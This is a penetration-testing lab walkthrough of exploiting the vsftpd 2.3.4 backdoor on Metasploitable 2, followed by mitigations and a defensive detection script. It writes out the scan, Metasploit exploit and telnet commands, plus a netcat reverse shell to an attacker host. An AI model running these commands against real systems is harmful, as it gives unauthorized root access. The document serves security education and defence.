
CVE-2011-2523 PoC — vsftpd OS Command Injection Vulnerability

Source
Related vulnerability
Title: vsftpd OS Command Injection Vulnerability (CVE-2011-2523)
Description: vsftpd is an FTP (File Transfer Protocol) server for Unix-like systems. vsftpd version 2.3.4 (as downloaded between 30 June 2011 and 3 July 2011) contains a security vulnerability caused by a backdoor in the software that can open a shell. An attacker can exploit this vulnerability to execute commands.
Description
A step-by-step walkthrough of exploiting the vsFTPd 2.3.4 backdoor vulnerability (CVE-2011-2523) in a controlled lab environment, demonstrating reconnaissance, exploitation with Metasploit, and establishing a reverse shell.
Introduction
# Penetration Testing Lab: vsFTPd 2.3.4 Backdoor Exploitation

This repository documents the process of identifying and exploiting the famous backdoor vulnerability in vsFTPd version 2.3.4 within a controlled lab environment (Metasploitable 2).

## Overview

During a routine penetration test, the vsFTPd service running on port 21 was identified as vulnerable. The service was found to be version 2.3.4, which contains a documented backdoor that allows unauthenticated remote command execution. This document details the steps taken to confirm the vulnerability and gain a reverse shell on the target system.

## Vulnerability Details

*   **Service:** vsFTPd (Very Secure FTP Daemon)
*   **Version:** 2.3.4
*   **CVE:** CVE-2011-2523
*   **Risk:** Critical (Remote Code Execution)

## Lab Setup

*   **Attacker Machine:** Kali Linux
*   **Target Machine:** Metasploitable 2
*   **Network Configuration:** The machines were connected via a NAT and bridged network adapter, allowing the attacker to access services on the target's local IP address.

## Executive Summary
A critical backdoor was identified in the target's FTP service (vsFTPd 2.3.4). This vulnerability allows an unauthenticated attacker to gain remote command execution, ultimately leading to a full reverse shell on the system.

## Phase 1: Reconnaissance & Enumeration

The initial discovery was made using a port scan with `nmap`.

**Command:**
```bash
nmap -sS -sV -A <target-ip>
```

**Relevant Findings:**
```
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.3.4
...
```
## Phase 2: Vulnerability Identification
The version `2.3.4` is notoriously vulnerable. This was confirmed using `searchsploit`.

**Commands:**
```bash
searchsploit vsftpd 2.3.4
```
*Output revealed several public exploits, confirming the vulnerability.*

## Phase 3: Initial Exploitation Attempts

### Attempt 1: Standalone Python Exploit
A public Python exploit was mirrored and executed but failed due to compatibility issues.

**Commands:**
```bash
searchsploit -m unix/remote/49757.py
python 49757.py <target-ip>
```
*Result: Script error (incompatible with Python 3).*

### Attempt 2: Metasploit Module
The Metasploit Framework provides a reliable exploit module.

**Commands:**
```bash
msfconsole
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS <target-ip>
run
```
*Result: The exploit ran successfully, triggering the backdoor. However, a standard Metasploit shell was not established. The backdoor opens a root shell on port 6200.*

## Phase 4: Manual Shell Access
The Metasploit module confirmed the backdoor was present.

### Step 1: Verify Backdoor Activity
```bash
telnet <target-ip> 6200
```
*Observation: Connection established but hung, indicating a listening shell.*

### Step 2: Establish a Reverse Shell
A reverse shell was set up using Netcat for stability.

**On Attacker (Kali): Start listener.**
```bash
nc -lvnp 4444
```

**On Target (via backdoor): Execute reverse shell.**
```bash
/bin/nc <attacker-ip> 4444 -e /bin/bash
```
*   `4444`: Listener port.
*   `-e /bin/bash`: Executes a bash shell.

*Result: Netcat listener caught the connection, providing a root shell on the target.*

## Phase 5: Mitigation Strategies
*   **Immediate Action:** Upgrade vsFTPd to the latest version available from the official repository.
*   **Network Controls:** If an upgrade is not possible, restrict FTP access at the network level (firewall) to trusted IP addresses only.
*   **Compromise Assessment:** A system running this vulnerable version should be considered fully compromised. A full forensic investigation and password resets are required.
*   **Monitoring:** Implement IDS/IPS rules to detect and block exploit attempts against this specific vulnerability.
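The monitoring recommendation above, as an added example that is not part of the original walkthrough: a small Python check that flags the two indicators this page describes, an FTP service banner reporting vsftpd 2.3.4 and an unexpected listener on tcp/6200. The `nmap -sV` and `ss -ltn` lines are constructed samples, and the set of expected listening ports is an assumed baseline.

```python
import re

VULNERABLE_VERSION = "2.3.4"  # release carrying the backdoor (CVE-2011-2523)
BACKDOOR_PORT = 6200          # port the backdoor shell listens on

# `nmap -sV` service line, e.g. "21/tcp open  ftp     vsftpd 2.3.4"
NMAP_LINE = re.compile(r"^(?P<port>\d+)/tcp\s+open\s+\S+\s+(?P<banner>.+)$")
# `ss -ltn` row, e.g. "LISTEN 0 128 0.0.0.0:6200 0.0.0.0:*"
SS_LINE = re.compile(r"^LISTEN\s+\d+\s+\d+\s+\S+:(?P<port>\d+)\s+")

def vulnerable_banners(nmap_output):
    """Return a finding for each open port whose banner reports vsftpd 2.3.4."""
    findings = []
    for line in nmap_output.splitlines():
        m = NMAP_LINE.match(line.strip())
        if m and "vsftpd" in m["banner"].lower() and VULNERABLE_VERSION in m["banner"]:
            findings.append(f"tcp/{m['port']}: {m['banner'].strip()} (CVE-2011-2523)")
    return findings

def suspicious_listeners(ss_output, expected_ports):
    """Flag a listener on the backdoor port, plus any port outside the baseline."""
    findings = []
    for line in ss_output.splitlines():
        m = SS_LINE.match(line.strip())
        if not m:
            continue
        port = int(m["port"])
        if port == BACKDOOR_PORT:
            findings.append(f"tcp/{port} listening: possible vsftpd 2.3.4 backdoor shell")
        elif port not in expected_ports:
            findings.append(f"tcp/{port} listening: not in expected baseline")
    return findings

# Constructed sample output (not captured from a real host).
SAMPLE_NMAP = """\
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.3.4
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
"""
SAMPLE_SS = """\
State  Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0      128    0.0.0.0:21         0.0.0.0:*
LISTEN 0      128    0.0.0.0:22         0.0.0.0:*
LISTEN 0      1      0.0.0.0:6200       0.0.0.0:*
"""

if __name__ == "__main__":
    for finding in vulnerable_banners(SAMPLE_NMAP) + suspicious_listeners(SAMPLE_SS, {21, 22}):
        print("[!]", finding)
```

Run it against real `nmap -sV` and `ss -ltn` output from a host to get the same findings; a listener on 6200 that is not part of the host's baseline is the post-exploitation signal the walkthrough observed with `telnet`.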

## References
- Exploit-DB: [vsftpd 2.3.4 Backdoor Exploit](https://www.exploit-db.com/exploits/17491)
- CVE-2011-2523: [MITRE Advisory](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523)
- NVD: [National Vulnerability Database Entry](https://nvd.nist.gov/vuln/detail/CVE-2011-2523)

## Disclaimer

This information is for **educational purposes only**. It is intended for use in authorized lab environments to understand attack methodologies and improve defensive strategies. Unauthorized testing against systems you do not own is illegal.
